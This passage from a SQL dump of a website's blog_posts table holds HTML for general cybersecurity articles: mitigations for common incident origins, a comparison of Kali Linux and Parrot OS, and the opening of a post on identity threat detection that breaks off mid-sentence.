[&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Train employees on phishing schemes, and use advanced email filtering systems.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Web Browsers</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Web browsers are another frequent culprit, often exploited through malicious websites, compromised ads, and drive-by downloads.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> Browsers connect users to the internet, making them a prime target for attackers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Keep your browser updated, disable unnecessary plugins, and use security extensions to enhance privacy online.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Vulnerable Applications and Software</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Outdated software, particularly those that fail to follow secure coding practices, often becomes the originating process for incidents. These applications are gateways for attackers exploiting known vulnerabilities.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> Many applications have vulnerabilities listed in the OWASP Top 10.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Regularly update software and implement robust patch management policies.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Compromised Credentials</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Brute-force attacks or leaked credentials can lead to unauthorized logins, making user account systems an originating process for data breaches.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> Weak or reused passwords are pervasive in the workplace.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Enforce strong password policies and implement multi-factor authentication (MFA).</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Remote Desktop Protocol (RDP) Connections</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Attackers often exploit poorly protected RDP connections to gain access to networks.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> Many companies use RDP for remote work setups, often without proper security configurations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Secure RDP with strong passwords, network whitelisting, and VPNs.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. <b><strong class=\"font-bold\">Command and Scripting Interpreters</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Processes like PowerShell and bash are frequently exploited as the originating process for executing malicious scripts or payloads.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> These are powerful tools that often lack restrictions, making them ideal for attackers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Implement script control policies and restrict access to advanced scripting tools.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. <b><strong class=\"font-bold\">Removable Media and USB Devices</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Attackers sometimes use malicious USB devices to introduce malware into secure environments, often bypassing traditional network defenses.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> Physical access often goes overlooked in incident prevention strategies.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Disable autorun features and use endpoint scanning solutions.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Evolving Role of the Originating Process in Cybersecurity Trends</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The importance of identifying the originating process will only grow as organizations face increasingly sophisticated threat actors. With AI-driven cybersecurity techniques and advancements in threat detection tools, cybersecurity professionals can analyze incidents more effectively, ensuring safer systems by the end of the mitigation process.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">As we approach 2025, staying ahead of cybersecurity trends will depend largely on mastering analysis techniques like isolating originating processes to improve incident response times and bolster defenses.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Getting Ahead of Threats with Better Processes</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The originating process isn\'t just a technical term—it’s a vital concept that can drive better cybersecurity outcomes. By understanding where attacks start and how they propagate, professionals can gain the upper hand against adversaries, protect sensitive data, and ensure systems are robust against potential threats.</p>', '', NULL, NULL, 1, 'draft', '2025-01-23 19:50:38', '2026-01-12 21:41:44', 'Information Security', 'Understanding the Originating Process in Cybersecurity', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(61, 'Which is Better for You? A Detailed Comparison of Kali Linux vs. Parrot OS', 'which-is-better-for-you-a-detailed-comparison-of-kali-linux-vs-parrot-os', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Choosing the right operating system is critical for cybersecurity professionals and privacy advocates. When it comes to penetration testing, ethical hacking, or maintaining your privacy online, <b><strong class=\"font-bold\">Kali Linux</strong></b> and <b><strong class=\"font-bold\">Parrot OS</strong></b> are two names that stand out. But which one is better suited to your needs? Let\'s compare these two powerhouse operating systems in detail, exploring their features, performance, security, and usability.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Are Kali Linux and Parrot OS?</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Kali Linux</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Developed and maintained by Offensive Security, <b><strong class=\"font-bold\">Kali Linux</strong></b> is a Debian-based distribution geared specifically towards penetration testing and security auditing. Widely recognized in the Cybersecurity industry, Kali comes pre-loaded with hundreds of <b><strong class=\"font-bold\">cybersecurity techniques</strong></b> and tools, such as Wireshark, Nmap, Metasploit, and Aircrack-ng.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Its primary focus is offensive security, making it an essential tool for penetration testers and ethical hackers who need a reliable OS to simulate attacks and identify vulnerabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features of Kali Linux:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">A large arsenal of pre-installed hacking and testing tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Frequent updates to incorporate the latest <b><strong class=\"font-bold\">OWASP Top 10 2023</strong></b> security exploits.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Detailed documentation for both beginners and experts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">A focus on offensive security testing.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Parrot OS</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Parrot OS, developed by Parrot Security, is another Debian-based distribution that combines <b><strong class=\"font-bold\">cybersecurity techniques</strong></b> with an emphasis on privacy and versatility. It offers tools not only for penetration testing but also for privacy enthusiasts who want to remain invisible on the internet.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Compared to Kali, Parrot OS is more user-friendly and versatile, making it a suitable choice for cybersecurity learners and privacy advocates alike.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features of Parrot OS:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Pre-installed tools for penetration testing, forensics, and development.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Built-in anonymization tools to enhance <b><strong class=\"font-bold\">internet privacy</strong></b>.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">A lightweight design for smoother performance on lower-end machines.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Broad support for data protection and encrypted communication.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Kali Linux vs. Parrot OS: A Head-to-Head Comparison</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Now that we’ve introduced both, let\'s break down the key differences across a variety of criteria.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Target Audience</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> is designed for professionals, particularly penetration testers, ethical hackers, and advanced-level cybersecurity experts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b> caters to a broader audience, including cybersecurity learners, privacy advocates, and tech enthusiasts looking for versatility combined with privacy features.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Toolsets for Cybersecurity</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> is packed with over 600 specialized tools tailored for penetration testing, offensive security, and network forensics. Tools like Hydra, Burp Suite, and John the Ripper make it ideal for uncovering vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b> also offers a wide range of tools, but with a balance between offensive and defensive techniques. Additionally, it includes development tools, such as those for programming and reverse engineering, as well as privacy-enhancing features like Anonsurf.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Focus on Privacy and Anonymity</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> is not primarily designed for privacy but can be configured for it. It’s more focused on cybersecurity professionals carrying out specific testing tasks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b>, on the other hand, makes privacy a priority. It includes built-in tools for <b><strong class=\"font-bold\">staying invisible on the internet</strong></b>, such as Tor, I2P, and Anonsurf, which anonymize your web activity and ensure your browsing sessions are safe and private.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Ease of Use</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> has a steeper learning curve. While its extensive toolset is ideal for experts, it may overwhelm beginners without prior knowledge of <b><strong class=\"font-bold\">cybersecurity techniques</strong></b>.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b>, however, is more beginner-friendly with a polished, lightweight interface and better hardware compatibility. It provides an easier transition for those just entering the cybersecurity field.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Performance</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> can be resource-intensive, especially if you\'re running it on older hardware. While it’s optimized for high-performance tasks, low-end machines may struggle.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b>, thanks to its lightweight architecture, performs efficiently even on older or low-spec devices, making it a more versatile option for users with limited hardware capabilities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. <b><strong class=\"font-bold\">Updates and Community Support</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> is backed by Offensive Security and benefits from frequent updates that align with <b><strong class=\"font-bold\">cybersecurity trends 2025</strong></b>. Its community is highly active, though very technical in nature.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b> also boasts frequent updates and a supportive community but leans toward a broader, more inclusive user base—not just experts but learners as well.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. <b><strong class=\"font-bold\">Use Cases</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> is largely tailored for penetration testing, network analysis, and offensive security projects where identifying vulnerabilities is key.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b>, with its privacy tools and expanded functionality, is equally suited for penetration testing, secure browsing, coding, and risk analysis.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Which One Should You Choose?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The right choice between Kali Linux and Parrot OS boils down to your specific needs:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Choose Kali Linux if</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">You’re a cybersecurity professional or seasoned ethical hacker.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Offensive security and vulnerability assessment are your primary focus.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">You need a wide range of specialized tools pre-installed and ready to go.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Choose Parrot OS if</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">You’re a beginner or intermediate cybersecurity enthusiast.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">You value <b><strong class=\"font-bold\">privacy online</strong></b> and frequently engage in secure communication.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\">You prefer a lightweight, versatile OS that works smoothly on low-spec hardware.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you’re still not sure which OS would suit your requirements better, consider testing both on a virtual machine. Experimenting hands-on will give you a practical understanding of their interfaces, compatibility, and features.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Future of Cybersecurity Tools</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the rapid pace of technological innovations, tools like Kali Linux and Parrot OS will only evolve. Both operating systems will likely integrate emerging features to reflect future <b><strong class=\"font-bold\">cybersecurity trends 2025</strong></b>, like AI-driven threat detection and dynamic vulnerability testing. Staying updated with these platforms ensures you’re equipped to tackle the complexities of the cybersecurity landscape head-on.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Both Kali Linux and Parrot OS are excellent operating systems that serve the cybersecurity community in different ways. Whether you prioritize extensive tools for penetration testing or seek a balanced platform with privacy features, there’s an OS tailored to your tasks.</p>', '', NULL, NULL, 1, 'draft', '2025-01-23 19:33:07', '2026-01-12 21:41:44', 'Information Security', 'Which is Better for You? A Detailed Comparison of Kali Linux vs. Parrot OS', '', NULL),
(62, 'Unlocking Identity Threat Detection and Response in Cybersecurity', 'unlocking-identity-threat-detection-and-response-in-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the growing prevalence of credential-based cyberattacks, protecting digital identities has become a critical priority for businesses. It’s far easier for attackers to exploit credentials, such as passwords, than to breach highly fortified systems. For organizations, safeguarding and monitoring access within their Identity and Access Management (IAM) frameworks has never been more essential. This article dives into the implementation of Identity Threat Detection and Response (ITDR) systems, offering a unified approach to prevention, detection, and response, and taking cybersecurity beyond just prevention methodologies.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why is Identity Threat Detection Crucial?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">User credentials, such as usernames and passwords, are among the most frequent targets for cyber attackers. They often provide direct access to critical systems and sensitive data, making them one of the biggest vulnerabilities in modern security landscapes. Reports show that many data breaches originate from stolen, compromised, or misused credentials, making credential security a pressing challenge.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IAM, or Identity and Access Management, is the framework businesses use to control and secure access to resources. Traditionally, IAM has focused on preventive measures like multi-factor authentication (MFA) and role-based access control (RBAC). While these methods are essential, they fail to address the gaps around detecting and responding to credential misuse. This is where ITDR systems step in to bridge the gap, 